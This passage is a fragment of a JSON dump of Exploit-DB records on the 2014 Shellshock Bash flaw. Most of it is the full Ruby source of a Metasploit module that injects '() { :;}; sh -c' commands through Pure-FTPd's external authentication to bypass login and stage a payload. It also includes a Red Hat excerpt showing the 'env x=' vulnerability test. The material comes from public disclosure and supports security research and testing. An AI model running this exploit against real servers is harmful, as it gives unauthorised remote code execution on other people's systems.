gid=65534(nogroup) groups=65534(nogroup)\r\n#shoutouts to Fredrik Str\u00ef\u00bf\u00bdmberg for the post he made on ycombinator\r\n\r\n\r\n \t\t \t \t\t \t\t \t \t\t ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34879/"}, {"lastseen": "2016-02-04T00:05:34", "description": "Pure-FTPd External Authentication Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7...", "published": "2014-10-02T00:00:00", "type": "exploitdb", "title": "Pure-FTPd External Authentication Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-02T00:00:00", "id": "EDB-ID:34862", "href": "https://www.exploit-db.com/exploits/34862/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Ftp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',\r\n 'Description' => %q(\r\n This module exploits the code injection flaw known as shellshock which\r\n leverages specially crafted environment variables in Bash. This exploit\r\n specifically targets Pure-FTPd when configured to use an external\r\n program for authentication.\r\n ),\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'Frank Denis', # Discovery of Pure-FTPd attack vector\r\n 'Spencer McIntyre' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-6271'],\r\n ['OSVDB', '112004'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 2048\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ],\r\n [ 'Linux x86_64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86_64,\r\n 'CmdStagerFlavor' => :printf\r\n }\r\n ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014'))\r\n register_options(\r\n [\r\n Opt::RPORT(21),\r\n OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])\r\n ], self.class)\r\n deregister_options('FTPUSER', 'FTPPASS')\r\n end\r\n\r\n def check\r\n # this check method tries to use the vulnerability to bypass the login\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n random_id = (rand(100) + 1)\r\n command = \"echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end\"\r\n if send_command(username, command) =~ /^2\\d\\d ok./i\r\n return CheckCode::Safe if banner !~ /pure-ftpd/i\r\n disconnect\r\n\r\n command = \"echo auth_ok:0; echo end\"\r\n if send_command(username, command) =~ /^5\\d\\d login authentication failed/i\r\n return CheckCode::Vulnerable\r\n end\r\n end\r\n disconnect\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def execute_command(cmd, _opts)\r\n cmd.gsub!('chmod', \"#{datastore['RPATH']}/chmod\")\r\n username = rand_text_alphanumeric(rand(20) + 1)\r\n send_command(username, cmd)\r\n end\r\n\r\n def exploit\r\n # Cannot use generic/shell_reverse_tcp inside an elf\r\n # Checking before proceeds\r\n if generate_payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to store payload inside executable, please select a native payload\")\r\n end\r\n\r\n execute_cmdstager(linemax: 500)\r\n handler\r\n end\r\n\r\n def send_command(username, cmd)\r\n cmd = \"() { :;}; #{datastore['RPATH']}/sh -c \\\"#{cmd}\\\"\"\r\n connect\r\n send_user(username)\r\n password_result = send_pass(cmd)\r\n disconnect\r\n password_result\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34862/"}, {"lastseen": "2016-02-03T23:53:42", "description": "GNU bash Environment Variable Command Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "GNU Bash - Environment Variable Command Injection ShellShock", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34765", "href": "https://www.exploit-db.com/exploits/34765/", "sourceData": "Exploit Database Note:\r\nThe following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\r\n\r\nLike \u00e2\u0080\u009creal\u00e2\u0080\u009d programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:\r\n\r\n$ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n vulnerable\r\n this is a test\r\n\r\nThe patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:\r\n\r\n $ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\r\n bash: warning: x: ignoring function definition attempt\r\n bash: error importing function definition for `x'\r\n this is a test", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34765/"}]}